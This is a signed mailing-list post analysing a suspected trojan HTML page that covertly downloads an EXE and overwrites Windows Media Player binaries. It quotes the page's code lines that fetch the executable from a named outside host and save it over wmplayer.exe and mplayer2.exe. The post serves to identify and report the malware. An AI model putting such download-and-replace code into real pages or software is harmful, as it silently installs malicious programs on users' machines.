Re: new WIN virus?

[Atom 'Smasher' <atom () suspicious org>]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

in response to replies i've received on and off list...

no: i'm not infected (i live in an M$-free home).

no: i didn't submit the [suspected] virus to anyplace other than what i
originally listed.

yes: the HTML file is a trojan. it's purpose is to covertly download the
EXE file, and replace media-players with it. the EXE file is likely up to
no-good, and that's the file that i tested for being a virus. a quick look
at the HTML file reveals that it's intent is evil. i don't have a good way
to check what the EXE file wants to do, but i assume that it's evil.


summary: i'm assuming that if the HTML page wants to covertly do this:

## snip
  x.Open("GET", "http://www.alextour.ru/dan/updatte.exe",0);
## snip
  s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
  s.SaveToFile("C:\\Program Files\\Windows Media Player\\mplayer2.exe",2);
## snip

then the EXE file is probably something that's not supposed to be a media
player, and should probably be recognized as a virus. the fact that it
isn't recognized as a virus makes me wonder if it's new.


        ...atom

 _______________________________________________
 PGP key - http://smasher.suspicious.org/pgp.txt
 3EBE 2810 30AE 601D 54B2 4A90 9C28 0BBF 3D7D 41E3
 -------------------------------------------------

        "Simply stated, there is no doubt that Saddam Hussein now
         has weapons of mass destruction."
                -- Dick Cheney, 26 August 2002
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (FreeBSD)

iD8DBQFAGXdLnCgLvz19QeMRAsWZAJ9o3yW0LiVlRWQ6+HvT9ctwqhPR7ACfWCfz
9ziAQPp5TEfznV6wQ7s+qOY=
=5sDs
-----END PGP SIGNATURE-----